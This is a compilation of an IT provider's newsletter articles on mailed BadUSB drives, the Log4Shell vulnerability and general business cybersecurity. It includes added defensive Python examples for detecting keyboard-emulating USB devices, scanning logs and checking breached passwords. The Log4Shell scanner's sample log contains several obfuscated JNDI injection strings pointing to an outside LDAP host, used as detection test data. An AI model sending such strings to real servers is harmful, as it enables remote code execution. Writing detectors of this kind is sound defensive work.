Hackers Mailing Bad USB Drives

LeeShanok IT News


According to a new FBI warning, cyber criminals are mailing USB drives that can install malware on business networks. The packages in these “BadUSB” attacks claim to be either a COVID-19 notice from the Department of Health and Human Services or a gift from Amazon.

In these recent cases, the drive presented itself to the victim’s computer as a keyboard and injected keystrokes, which led to the installation of ransomware. Keystroke injection is only one of the attacks a BadUSB device can carry out, and because the malicious behaviour lives in the device’s firmware rather than in files on the drive, scanning the drive’s contents will not reveal it.
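The tell-tale of a BadUSB device is in how it enumerates: a “flash drive” that also registers a Human Interface Device keyboard interface, or a keyboard nobody issued. The following is an added example written for this page (not code from the original article): a Python script that parses `lsusb -v`-style interface descriptors and flags those two patterns, the same policy a tool such as USBGuard can enforce on Linux hosts. The device listing, the vendor/product IDs and the `KNOWN_KEYBOARDS` allowlist are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample in the shape of `lsusb -v` output. The vendor:product IDs
# and names are made up for this example, not captured from real devices.
SAMPLE_LSUSB = """\
Bus 001 Device 004: ID 1234:0001 Example Corp Flash Drive
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk-Only
Bus 001 Device 005: ID 1234:0002 Example Corp Flash Drive
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk-Only
      bInterfaceClass         3 Human Interface Device
      bInterfaceSubClass      1 Boot Interface Subclass
      bInterfaceProtocol      1 Keyboard
Bus 001 Device 006: ID 1234:0003 Example Corp Keyboard
      bInterfaceClass         3 Human Interface Device
      bInterfaceSubClass      1 Boot Interface Subclass
      bInterfaceProtocol      1 Keyboard
Bus 001 Device 007: ID 1234:0004 Example Corp Keyboard
      bInterfaceClass         3 Human Interface Device
      bInterfaceSubClass      1 Boot Interface Subclass
      bInterfaceProtocol      1 Keyboard
"""

USB_CLASS_HID = 3
USB_CLASS_MASS_STORAGE = 8
HID_PROTOCOL_KEYBOARD = 1

# Hypothetical allowlist of keyboards the IT team has issued (vendor:product).
KNOWN_KEYBOARDS = {"1234:0003"}

DEVICE_RE = re.compile(r"^Bus \d+ Device \d+: ID ([0-9a-f]{4}:[0-9a-f]{4}) (.*)$")
IFACE_RE = re.compile(r"^\s*bInterface(Class|SubClass|Protocol)\s+(\d+)")


@dataclass
class UsbDevice:
    vid_pid: str
    name: str
    interfaces: List[Tuple[int, int, int]] = field(default_factory=list)


def parse_lsusb(text: str) -> List[UsbDevice]:
    """Collect (class, subclass, protocol) for every interface of every device."""
    devices: List[UsbDevice] = []
    current: Dict[str, int] = {}
    for line in text.splitlines():
        m = DEVICE_RE.match(line)
        if m:
            devices.append(UsbDevice(m.group(1), m.group(2).strip()))
            current = {}
            continue
        m = IFACE_RE.match(line)
        if m and devices:
            current[m.group(1)] = int(m.group(2))
            if m.group(1) == "Protocol":  # last of the three descriptor fields
                devices[-1].interfaces.append(
                    (current.get("Class", 0), current.get("SubClass", 0), current["Protocol"]))
                current = {}
    return devices


def assess(dev: UsbDevice) -> str:
    """Return 'allow' or a 'block: ...' reason, mirroring a USBGuard-style policy."""
    classes = {c for c, _, _ in dev.interfaces}
    has_keyboard = any(c == USB_CLASS_HID and p == HID_PROTOCOL_KEYBOARD
                       for c, _, p in dev.interfaces)
    if USB_CLASS_MASS_STORAGE in classes and has_keyboard:
        return "block: storage device also presents a keyboard interface"
    if has_keyboard and dev.vid_pid not in KNOWN_KEYBOARDS:
        return "block: keyboard not on the issued-hardware allowlist"
    return "allow"


def assess_all(text: str) -> Dict[str, str]:
    """Verdict per device, keyed by vendor:product ID."""
    return {d.vid_pid: assess(d) for d in parse_lsusb(text)}


if __name__ == "__main__":
    for vid_pid, verdict in assess_all(SAMPLE_LSUSB).items():
        print(vid_pid, verdict)
```

On a real host, feed it the output of `lsusb -v`. The check complements the advice below rather than replacing it: a device that presents only a keyboard, like device 1234:0004, is indistinguishable from a genuine keyboard except by whether IT issued it, which is why the allowlist matters.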

What should I do?

Never plug in an unfamiliar USB Drive. This includes devices received in the mail or found out in the street. Be extra cautious of USB drives with enticing labels like “Bitcoins” or “Gift Cards.” It’s best to dispose of these devices immediately.

If you come across a USB drive you think may hold important data, send the device to your IT provider. They can examine it on an isolated machine that is not joined to the company network, where a device that suddenly registers as a keyboard can do no harm, and recover any files from there.

USB Security, and Other Cybersecurity Tips, in This Week’s Webinar

USB Security is just one of the many important topics covered in the IT Security Awareness for the Common Worker 101B training.

The free training will take place this Thursday, January 13th from 11am – 11:45am. Topics include:

  • Next gen phishing prevention
  • USB Safety
  • Strengthening your Human Firewall
  • Updates & Patches
  • & Much More

Miss last month’s 101A training? No problem! 101B is a standalone webinar with crucial cybersecurity tips for every employee, regardless of IT expertise. Hope to see you there!


LeeShanok Network Solutions

3877 N 7th Street | Suite 320 | Phoenix | Arizona | 85014


LeeShanok IT News – IT Resolutions for 2022!

The new year is just around the corner! As the calendar turns, it’s a great time to reflect on what you want from the year ahead. Here are our top five IT resolutions for 2022.

Top 5 IT New Year’s Resolutions

  1. Set your IT roadmap – What goals do you have for your technology next year? What will no longer be supported in 2022? What kind of support will you need? A clear destination makes the journey much easier.
  2. Schedule annual cybersecurity training for everyone at your company. Cybercrime is expected to increase again in 2022, and education is the best defense, so make sure everyone is well trained. Our next cybersecurity training is Thursday Jan. 13th. Register Here.
  3. Get adequate cyber insurance – With the increasing risk, cyber insurance is growing more and more important. Make sure you have an appropriate policy. Riders on your general liability policy may no longer be enough.
  4. Invest in collaboration – The shift to hybrid and fully remote work is expected to continue in 2022. Make sure you’re getting the most from your collaboration tools so your teams don’t become isolated.
  5. Thoroughly assess your cloud strategy – Businesses are expected to continue migrating more functions to the cloud. This opens the door to higher efficiency and lower costs, but getting the migration right can be difficult. Each vendor’s reliability, security, and functionality must be carefully considered.

As always, LeeShanok is happy to help! Let us know how we can help you stick to these resolutions, or any others you’re making for 2022.

LeeShanok Network Solutions is Turning 25!
On January 1st, LeeShanok will officially turn 25! We’re excited we can finally rent a car, but we’re even more excited to continue helping you manage your technology.

Our success is thanks to you, our clients. Since 1997, you have challenged us to grow and adapt. The technology landscape is entirely different today than it was back then but supporting happy clients has kept us motivated to keep learning and keep getting better.

From the entire LeeShanok team, our sincerest THANK YOU! We have a lot of exciting things planned to celebrate, stay tuned!

Your Technology Partner,

The LeeShanok Team

Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

LeeShanok IT News – Major Vulnerability – Log4j Exploit

Last week, a critical vulnerability in the Log4j logging library, dubbed Log4Shell (CVE-2021-44228), was disclosed. It lets an attacker run code of their choosing on a victim’s computer or server: Log4j’s JNDI lookup feature interprets a specially formatted string in any text that gets logged, such as a web request header, and fetches and runs code from a server the attacker names. The exploit is easy to execute and very widespread because the Log4j library is used in many software packages and online systems.

Because of the ease of attack, its widespread nature, and the potential damage, it is rated riskier than 99.61% of all known cybersecurity vulnerabilities.

What Hackers Are Doing
Currently, attackers are primarily scanning for vulnerable systems and taking control of them to mine cryptocurrency. However, the same access allows far more damaging actions, such as stealing data or deploying ransomware.
What LeeShanok is Doing
We have seen scans and exploitation attempts against several of our clients’ servers. Thankfully, next generation firewalls have blocked these attempts so far. Keep in mind that firewall signatures are a stopgap: attackers obfuscate the lookup string to evade them, so a firewall buys time but does not remove the need to patch. If you are not sure if you have the correct type of firewall protecting you, ask your account manager.

For all of our managed IT clients, we are automatically patching using the following process. This is included in your managed IT plan:
1. Checking whether an exploitation attempt has been made against the system
2. If so, checking whether any payload was executed
3. If so, assessing the risk level of the payload
   a. If the risk is low, performing a malware scan
   b. If the risk is high, taking the system offline and restoring from a backup taken before the attempt
4. Applying security patches and rebooting if needed
5. If there is a next generation firewall, confirming it is configured to block intrusion attempts
6. Performing a vulnerability scan to confirm the patch was successful
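Step 1 of the process, finding out whether an exploitation attempt was made, usually means searching web and application logs for the JNDI lookup string. The following is an added example written for this page (not LeeShanok’s tooling): a Python scanner over constructed access-log lines that first undoes the substitution tricks attackers use to hide the string (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) and then flags lines containing a `${jndi:...}` lookup. The log lines, the IP addresses (from the RFC 5737 documentation ranges) and the `NOPE` variable name are made up.

```python
import re
from typing import List, Optional, Tuple

# Constructed web-server access log lines in Apache combined format. The
# payloads are the common obfuscated forms seen in Log4Shell scanning, placed
# in the User-Agent header or the query string.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Dec/2021:08:01:10 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.9 - - [13/Dec/2021:08:01:13 +0000] "GET /?q=${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://198.51.100.5/a} HTTP/1.1" 404 196 "-" "curl/7.79"
203.0.113.9 - - [13/Dec/2021:08:01:14 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.5/a}"
203.0.113.9 - - [13/Dec/2021:08:01:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi${env:NOPE:-:}${env:NOPE:-l}dap${env:NOPE:-:}//198.51.100.5/a}"
203.0.113.12 - - [13/Dec/2021:08:02:00 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 ${date:yyyy}"
"""

# An innermost lookup: ${...} whose body contains no further $ { } characters.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# What we are ultimately looking for, case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Emulate the Log4j substitutions attackers abuse to hide 'jndi'.

    Returns the replacement text, or None to leave the lookup in place (the
    jndi lookup itself, and lookups this example does not model, e.g. date/sys).
    """
    if body.lower().startswith("jndi:"):
        return None                       # this is the thing we want to see
    if ":-" in body:                      # ${x:-default}: an unresolved x yields default,
        return body.split(":-", 1)[1]     # which covers ${::-j} and ${env:NOPE:-j}
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def normalize(s: str, max_rounds: int = 25) -> str:
    """Resolve innermost lookups repeatedly until nothing more changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match") -> str:
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        s = INNERMOST.sub(repl, s)
        if not changed:
            break
    return s


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

A plain search for the literal text “jndi” misses lines 3 to 5 of the sample; the normalization step is what makes them visible. Treat a hit as an attempt, not as proof of compromise: step 2 of the process (did anything execute?) still has to be answered on the host.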

If you are not a managed IT client, and you would like our team to assist with assessing your systems, please reach out to us for support.

What You Should Do
Stay alert for any updates/patches pushed out by your other technology vendors and install them immediately. Keep an eye out for further communication from LeeShanok pertaining to your unique situation.
The LeeShanok Team

How to Improve Cybersecurity

IT cybersecurity is designed in layers. Digital threats to a company usually originate from outside. An attacker who breaches one layer tends to settle in and move laterally to other devices at the same layer, so when the next layer is attacked, the attempts come from multiple compromised devices at once. By the time the inner layers are breached, many devices have already been compromised, and exfiltration of company data has probably already occurred. See Why Cybersecurity is Important.

With network infrastructures that include both on-premises and cloud-based infrastructure, layering your network cybersecurity to protect it all can be challenging. Historically this would require unique solutions for each part of the infrastructure, but today there are solutions available that simplify and consolidate monitoring and management. There are many ways to protect against threats. Below are actionable ways to improve your firm’s cybersecurity.

End Users & Devices

Protect Wi-Fi Network Access from Cyberattacks

Many firms have both a staff Wi-Fi network and a guest Wi-Fi network. The staff network usually requires a password, but the guest network often has none. An open network lets anyone within radio range join it and attack the other devices connected to it. Require a password on all of your firm’s Wi-Fi networks, and keep guest clients isolated from each other and from the staff network.

Another issue emerges with Wi-Fi authentication when an employee is terminated. The terminated employee could park close by and connect to the guest Wi-Fi (open) or staff Wi-Fi network (Wi-Fi password still the same), where they could launch attacks against other connected devices or seek company data to steal.

Most firms do not change the Wi-Fi password when an employee leaves because it requires every remaining employee to update the password on each device they connect with. As time goes by, more and more former employees retain access to the company’s Wi-Fi networks. Adding a RADIUS server to your Wi-Fi authentication (WPA2- or WPA3-Enterprise, also known as 802.1X) fixes this: each user authenticates with their own Active Directory (AD) account instead of a shared password. When an employee is terminated, disabling their AD account prevents them from connecting to the Wi-Fi network, and no other employee’s access is affected.

Security Measures on Mobile Devices

Regardless of operating system, many employees use personal mobile devices to read company email, log in to cloud accounts, generate and send quotes, and other tasks that require access to company networks and data.

These employee devices may not meet sophisticated cybersecurity measures the company demands from connected devices, and are therefore vulnerable to external access and cyberattacks. If an employee loses their device, all the data and stored credentials may be available to cyber criminals.

To guard against these risks, companies should use a Mobile Device Management (MDM) platform and enroll every personal phone that is used for company business. A good MDM pushes security policies to enrolled devices (for example a required screen lock, storage encryption and a minimum OS version) and can locate or remotely wipe a lost phone. Employees should also set up “Find My Phone” while they still have the device so that a lost device is easier to recover.

Utilize Group Policies for Cybersecurity

Group policies are central rules that can be applied to all devices that access company resources. Common cybersecurity policies can be designed for all user accounts and devices at time of login. Policies can also be designed by groups. For example, senior management devices have different cybersecurity rules than front-line workers.

Pushing out security settings this way removes the need to sit at each device and configure it by hand, lets you tighten a setting everywhere at once when a threat or breach is discovered, and gives all employees with the same job type or access to the same data stores a consistent policy.

Improve Employees’ Password Management

Many employees have a favorite password they never forget, and they use it across multiple websites and their domain login. A data breach at just one of those sites, and all the employee’s accounts are compromised. A better strategy is to use a different password on each site, but that can be impossible to remember without writing them down, another risky practice.

The best strategy is to use a company-wide password manager that generates complex passwords and provides access to password folders via role-based policies. Some password managers provide segmentation of each user’s passwords with their own secure folder, allowing them to manage both their personal and professional passwords. With this strategy, your employee only needs to create and memorize one strong password for the password manager.

Enable Multi-Factor Authentication on All Your Accounts

Enabling multi-factor authentication (MFA, also called two-factor authentication) adds a layer of protection to each user account’s sensitive information. When logging in, after the username and password are accepted, the site sends a text message or a notification to an authenticator app on your phone, and the connection completes only after you confirm it. App-based codes, push prompts and hardware keys are stronger than SMS codes, which can be redirected by a SIM swap.

Strong authentication is particularly useful against someone who has obtained your password and tries to log in to one of your online accounts to steal your personal data. You would receive a notification for a login attempt you did not initiate; do not approve it. That is the time to change the account password to a different strong password, as it is clear someone has the current credentials.

Individuals can reduce their cyber risk by enabling MFA on many individual sites, but a faster way is to have your IT department or your managed IT service provider require it for all accounts.

Require Cybersecurity Training

The user is the most important security measure, and an educated user fortifies all other layers of security. Up to 95% of cybersecurity breaches are the result of human error, so it’s important to have all employees regularly trained on cybersecurity best practices.

Many webinars and in-person trainings are available, but it’s important to select a provider who is knowledgeable and has invested in the quality and delivery of the material.

LeeShanok’s IT Security for the Common Worker series is a free, monthly webinar that teaches cybersecurity best practices to employees of all levels of IT skill. LeeShanok also offers custom, in-person training to Arizona businesses.

Local Network Infrastructure

Assess Your Network Infrastructure and Security

Before making changes to your network, it’s important to assess what you currently have and create a network diagram if one does not exist already. Making changes without understanding the current network layout can result in additional complexity and reduced security.

If you’re not sure where to start, most managed IT service providers (MSPs) offer network assessments that generate documentation of the infrastructure, credentials, configurations, and recommendations to improve security.

Some MSPs like LeeShanok also offer network security assessments, which include the network assessment documentation along with an analysis of the security posture and the risks present. A network security assessment may also include penetration testing to confirm which vulnerabilities can actually be exploited.

Segment Your Network

If you have two Wi-Fi networks (such as a staff network and a guest network), placing them on separate VLANs provides a security barrier: devices and sessions in one VLAN cannot reach devices in the other unless a router or firewall between them explicitly allows it, so pair the VLANs with firewall rules that deny guest-to-staff traffic. Avoid using VLAN 1 for either of them, because it is the default VLAN on most switches and any untagged port lands in it. Network segmentation can be physical or logical and involves breaking a network into smaller subnets.

Segmenting your public Wi-Fi architecture and maintaining software updates helps simplify management of firewall policies, reduces the overall attack surface, and strengthens your firm’s security.

Proactively Manage Infrastructure

It is very important that the cybersecurity of your network not be a set-and-forget exercise. Even the best defenses lose effectiveness over time as attackers probe for and find new vulnerabilities. Many smaller firms use home-grade devices, leaving large security holes for a sophisticated attacker to walk through.

It is challenging and expensive for internal staff to continuously manage these risks, which is why many use a “set and forget” strategy. Professional Managed IT Service Providers solve this by specializing in proactively securing, fixing, and updating technology more affordably than additional internal staff.

Consider hiring a Managed IT Provider if your internal resources aren’t able to regularly research and deploy new cybersecurity strategies to keep up with the evolving threat landscape.

Replace Legacy Devices

Improve your cybersecurity posture by replacing aging devices with new devices that have more sophisticated and coordinated security features. Work with your internal IT or your managed IT service provider to select new devices that align with your overall IT strategy.

Following deployment, it is also important for you or your managed service provider to actively manage infrastructure components, keep their firmware and software up to date, and investigate all notifications when threats are detected.

Update Firmware and Software in All Devices

Many attacks exploit vulnerabilities in networking, server and end-user devices. Manufacturers respond to discovered vulnerabilities by developing and releasing updates and patches to both firmware and embedded software. Most devices do not automatically install updates, so there is human involvement needed to search for and install updates to devices. This process should be repeated at least quarterly for all infrastructure devices. Learn how to Update Firmware in Network Devices.

Software suites also regularly release updates and patches to be installed. Some are installed automatically, while others need to be manually installed. All employees should be keeping software up to date.

Use SSL VPN for Site-to-Site Connections

Virtual Private Networks (VPNs) have been a secure method of remotely connecting to company resources for years. Unfortunately, VPN gateways and client software are a favourite target, and vulnerabilities in them have repeatedly allowed attackers to gain admin access to the VPN interface, opening it up for rogue connections to a company domain. Treat the VPN as the internet-facing system it is and patch it promptly.

Upgrade to SSL VPN connections (the protocol is TLS today, but the name has stuck), which require an SSL/TLS certificate, purchased from a public certificate authority or issued by your own, to be imported into each connected firewall to establish trust. New VPN client software is required on end user devices to connect via SSL VPN. The certificate authenticates the gateway to the client; it does not replace the need to patch the VPN software itself.

Other permanent VPN tunnels may be used to connect a local network to a cloud hosted environment like Microsoft Azure. SSL VPN should be used here as well to protect the connection and access to the hosted environment.

See LeeShanok’s IT News articles on:  SSL/TLS Migration for PCI Compliance, Work Remote Securely

Manage Firewall Ports

Firewall ports correspond to the services computers use to talk to each other. A few are typically allowed by default, such as 443 so users can reach HTTPS websites. Other ports should be managed more actively: allowed only while a service legitimately needs to accept connections, with stateful rules that admit the return traffic of connections started from inside and nothing else.

Ports can be closed by disabling the service that listens on them or by firewall rules that deny everything and permit only explicit exceptions (Deny-All-Permit-By-Exception, DAPE). Disabling Universal Plug and Play (UPnP) on the firewall also prevents any computer on the network from opening inbound ports on its own, without an administrator’s approval.

Enabling both network firewall and host-based firewall capability is a best-practice. Enabling firewall rules will block external services, but should be tested to make sure desired services can still communicate.

On end-user computers, port management is done by the host firewall built into the operating system (Windows Defender Firewall on Windows), although some antivirus suites replace it with their own. It’s usually fine to allow the default configuration, but some firms use a group policy to push a stricter set of rules to all end-user devices.

Set Up GeoLocation and GeoBlocking

Certain geographies are known to present greater cybersecurity risks; for example, a large share of the attack traffic organisations see originates from addresses in China and Russia. GeoLocation estimates where a connection originates, and GeoBlocking blocks connections from those regions.

If your company doesn’t do business in a risky geography, it should be GeoBlocked by default. Most newer firewalls have this option available. Keep in mind that geolocation is an estimate and attackers routinely relay through VPNs, proxies or compromised hosts in permitted countries, so GeoBlocking cuts down noise rather than stopping a determined adversary.

Cloud Infrastructure and Services

Migrate from Backups to Business Continuity & Disaster Recovery

To recover from a breach, infection or ransomware, backups are the best method. Traditional backups usually involved an external USB drive physically plugged in to a server or end user computer. This method may not include cloud-based data, it doesn’t protect against an on-premises disaster, recovery may take longer, and because the drive stays connected, ransomware that reaches the server can encrypt the backup along with everything else.

Modern backup capability includes business continuity and disaster recovery (BCDR), which backs up operating systems, Active Directory configurations, and storage. BCDR usually involves an on-premises backup which has the ability to complete a restoration in a few minutes or hours, rather than the days or weeks a server re-build requires. There’s also a redundant cloud-based backup in the event of an on-premises disaster.

Diagram of the structure of Datto’s Siris BCDR solution.

Backup your Cloud Environments

Modern backup strategies should also include important Software-as-a-Service (SaaS) accounts like Microsoft 365 or Google Workspace. Microsoft protects their data center and all data from natural disasters and failures. However, you are responsible for data loss due to human error, external hackers, malicious insiders, and more.

Approximately 90% of all companies use the cloud in some capacity and falsely assume data is backed up automatically. SaaS Protection for cloud accounts is a must-have for a modern backup strategy.

Monitor Dark Web for Compromised Company Credentials

Dark web monitoring generates reports of users in your domain whose usernames and passwords are found for sale on the Dark Web. A Dark web monitoring service can notify you when those credentials are compromised, so you can have the employee reset passwords and enable Multi-Factor Authentication.
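Both the password-manager section above and dark web monitoring rest on the same question: has this credential already turned up in a breach dump? The following added example, written for this page and not part of LeeShanok’s service, shows how a password can be checked against a breach corpus without ever sending the password itself, using the k-anonymity range lookup that Have I Been Pwned’s Pwned Passwords API exposes: only the first five characters of the password’s SHA-1 leave the machine, and the matching suffix is searched for in the returned list. The range data here is a constructed offline stand-in (the counts are invented; the SHA-1 of “password” is real), and `is_acceptable` and `generate_password` are hypothetical policy helpers.

```python
import hashlib
import secrets
import string
from typing import Callable, Dict

# Constructed stand-in for the Pwned Passwords range API. The real service at
# https://api.pwnedpasswords.com/range/<prefix> returns lines "SUFFIX:COUNT";
# this dict holds made-up ranges so the example runs offline. The SHA-1 of
# "password" really is 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8; the other
# suffixes and all counts are invented.
FAKE_RANGES: Dict[str, str] = {
    "5BAA6": "\r\n".join([
        "1D2DA4053E34E76F6576ED1DA63134B5E2A:2",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471",
        "2A6C3D18BA51D0D3A1D1B8D6A4F1B9E2C3D:1",
    ]),
}


def fetch_range_offline(prefix: str) -> str:
    """Stand-in for the HTTPS GET; an unknown prefix yields an empty body."""
    return FAKE_RANGES.get(prefix, "")


def pwned_count(password: str,
                fetch_range: Callable[[str], str] = fetch_range_offline) -> int:
    """k-anonymity lookup: send the 5-char SHA-1 prefix, match the suffix locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch_range(prefix).splitlines():
        if not line.strip():
            continue
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0


def is_acceptable(password: str,
                  fetch_range: Callable[[str], str] = fetch_range_offline,
                  min_len: int = 14) -> bool:
    """Hypothetical policy an onboarding form or password manager might enforce:
    long enough and never seen in a breach."""
    return len(password) >= min_len and pwned_count(password, fetch_range) == 0


def generate_password(length: int = 20) -> str:
    """Random password of the kind a password manager generates (CSPRNG-backed)."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for candidate in ("password", generate_password()):
        print(repr(candidate), "seen", pwned_count(candidate), "times; acceptable:",
              is_acceptable(candidate))
```

To use the live service, replace `fetch_range_offline` with a function that performs the HTTPS GET and returns the response body; the password never needs to leave the machine, which is what makes the check safe to run against every new password.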

LeeShanok offers a complimentary Dark Web Scan that shows the compromised usernames and passwords of everyone with an email address on your company’s domain.  

Migrate from EDR to XDR

Endpoint Detection and Response (EDR) is the established method of monitoring endpoints for advanced persistent threats and new malware that may evade other defenses. Extended Detection and Response (XDR) extends this beyond the endpoint, correlating telemetry from network devices, identity systems, on-premises environments and cloud environments.

XDR usually provides a “single pane of glass” for monitoring and responding to threats. It also applies analytics, often marketed as artificial intelligence (AI), to logs from multiple platforms to produce accurate, context-rich alerts.

Plan for Secure Access Service Edge (SASE)

SASE is a new framework in which networking and security converge into a single integrated service that works at the cloud edge to deliver networking and security functions as a service. With widespread cloud adoption, the SASE model simplifies and consolidates many different networking and security functions.

The technology is still in its early stages, but expect to adopt this model soon if your organization hasn’t yet. As an example, Cisco’s SASE offering includes:

  • SD-WAN
  • Cloud security
  • Zero trust conditional access
  • Umbrella security
  • Secure access by DUO
  • ThousandEyes for network outage monitoring

Hire a Managed IT Security Provider

As you can see, improving cybersecurity can be a challenging task. It requires constant vigilance and a high degree of technical expertise. Threats like ransomware are increasing every year, and businesses of every size are lucrative targets.

Many companies choose to hire managed IT service providers for their IT security. It’s generally more cost-effective, and the knowledge pool is deeper than what can be achieved with most internal IT teams. LeeShanok has been providing IT security since 1997. Request a complimentary network assessment to find out where your network is vulnerable, and which steps are most important for you to take.

What are Managed IT services?

Managed IT consists of a collection of services performed by an external IT company, also known as a Managed Service Provider (MSP). Managed IT services are more comprehensive than other forms of external IT like break-fix support. Managed IT represents a partnership between the client and the MSP, where both parties are invested in the long-term success of the client’s IT strategy.

Managed IT services are sometimes confused with outsourced IT because both are performed by third-party IT specialists. However, managed IT takes a more holistic and proactive view of technology management, while outsourced IT is employed for more specific tasks. “Outsourced IT” can also conjure images of overseas support from an impersonal call center. Managed IT is a closer partnership built on a trusted relationship with a provider that is typically local. Learn how managed IT works and some of the most common services offered under a managed IT Plan.

How IT Works With a Managed Service Provider

IT services from a managed service provider can be thought of as a subscription. The managed services are offered in exchange for a recurring fee. Payment structures vary, but the general model is the same. Long-term, comprehensive IT managed services are delivered in exchange for regular payments. In the IT world, this is sometimes referred to as the “X as a Service” (XaaS) model. In most cases, the monthly payments will total less than the amount required to hire full-time staff.

Managed service providers and client companies agree on the responsibilities of each party in the agreement. The formal contract is called the Service Level Agreement (SLA). The SLA spells out the services the MSP will perform, performance metrics, and fees that the managed service provider will charge. It also clearly defines the responsibilities of the client and the responsibilities of the MSP.

Once the SLA is agreed to and signed, you and the managed services provider work together to transfer management to the MSP. Managed IT services are highly involved, so expect to work closely with the provider.

Common Managed Services

Managed service providers are diverse in their capabilities and specializations. Some focus specifically on certain services or industries. Others are more flexible, able to adapt to your unique needs. The following are common managed services, but this is not an exhaustive list.

Network Design and Administration

Network administration is the management of an organization’s connected IT infrastructure. Common network devices include servers, firewalls, wireless routers, shared storage, and end-user computers. The list of possible devices and configurations that can be on a network is almost limitless. The managed IT service provider takes responsibility for recommending, installing, and servicing network devices with an eye toward long-term performance.

Top MSPs also manage vendor relationships and support contracts, sending renewal notices or invoices when they come due, which keeps your access to firmware and software patches. The best managed IT providers will future-proof your network by making sure it has the capacity and scalability to keep up with business growth.

Monitoring and Maintenance

With managed services, your technology infrastructure is proactively managed. Networks and devices are actively monitored to catch and resolve issues before they can cause significant problems, which can greatly reduce unpredictable labor bills. Maintenance focuses on keeping current devices up to date and healthy rather than simply repairing broken devices. Just like with car maintenance, spending a little on routine work now prevents costly breakdowns in the future.

IT Security

IT Security services are some of the most important on the managed services market. Cyberattacks against businesses increase in frequency and severity every year as hackers uncover new device vulnerabilities and launch sophisticated campaigns against companies.

IT security is a component of most other managed services. For example, firewall maintenance is part of network administration. However, proper IT security now requires a security-first, zero-trust philosophy rather than just security technology.

Further, an IBM study revealed up to 95% of cybersecurity breaches are the result of human error. Employee education is a key component of cybersecurity, so your managed IT service provider should offer IT security training for your employees. LeeShanok hosts a free monthly webinar series, “IT Security for the Common Worker.”

Many managed IT service providers stop at providing technical solutions like firewalls and intrusion prevention systems. A newer class of service providers called Managed Security Service Providers (MSSPs) go beyond by offering advanced threat detection, response, and compliance with governmental and industry requirements.

Data Backup and Recovery

Data loss happens for many reasons. It can be the result of hardware failures, natural disasters, employee errors, or hackers – just to name a few. It can consist of destruction or exfiltration of sensitive company information like contact lists, access credentials, customer data, and more. Data backup and recovery services mitigate the risk of losing data while reducing downtime with a strong disaster recovery plan.

Under a managed services plan, data backup and recovery involves two components: technology and strategy. Technology is the hardware and software that stores the backed-up data and restores systems. Strategy answers questions like, “should we keep a backup on-site, off-site, or both?” and, “how much downtime is acceptable in the event of a disaster?”

Managed services help with both technology and strategy. A provider can recommend, install, and service the technology. More importantly, a managed IT service provider can help you develop a strategy that finds the right balance between cost, performance, and continuity.

Voice and Video Communications

A managed services plan can also include the support and maintenance of your business communication technologies. Voice over Internet Protocol (VoIP) phone systems are becoming the standard for most businesses. There are dozens of phone system providers with multiple configuration options, making it hard to know which system is the best fit. A managed service provider can help support your current phone system or select and install a new one.

Similarly, videoconferencing on platforms like Zoom, Microsoft Teams, and Cisco Webex has become essential, especially for companies with a remote workforce. A managed IT service provider can help you select the appropriate licenses and ensure your network and hardware can support videoconferencing.

Helpdesk Support

Where do you turn when you have problems with technology? For the majority of a firm’s workforce, it’s the helpdesk. An IT service provider’s helpdesk fixes common problems like:

  • My printer isn’t working
  • I can’t connect to the internet
  • I accidentally deleted a file
  • I forgot my password

Helpdesk support is an important component of a managed services plan because most employees interact with IT via the helpdesk. Great customer service is what separates a competent managed service provider from an exceptional one.

When considering a managed IT services company, seek out customer reviews and testimonials, and confirm that it offers remote monitoring, infrastructure management, technology services, and support services.

Cloud Management

Companies large and small are phasing out on-premises IT infrastructure in favor of cloud services. Without a strong cloud management strategy, it can be easy to overspend and hard to know which services you truly need. Managed IT services can help you select the appropriate cloud vendor and the proper level of cloud computing to make sure goals are met and budgets aren’t blown.

Some managed IT service providers like LeeShanok also offer their own data center for hosting private cloud environments with virtual servers, centralized storage, and secure access by remote and office-based staff. This is especially important if your business requires a private cloud environment.


Benefits of Managed Service Providers

You know the common services included under a managed IT plan, but why would you use managed services over an internal IT department? The two are not mutually exclusive, but instead complement one another effectively.

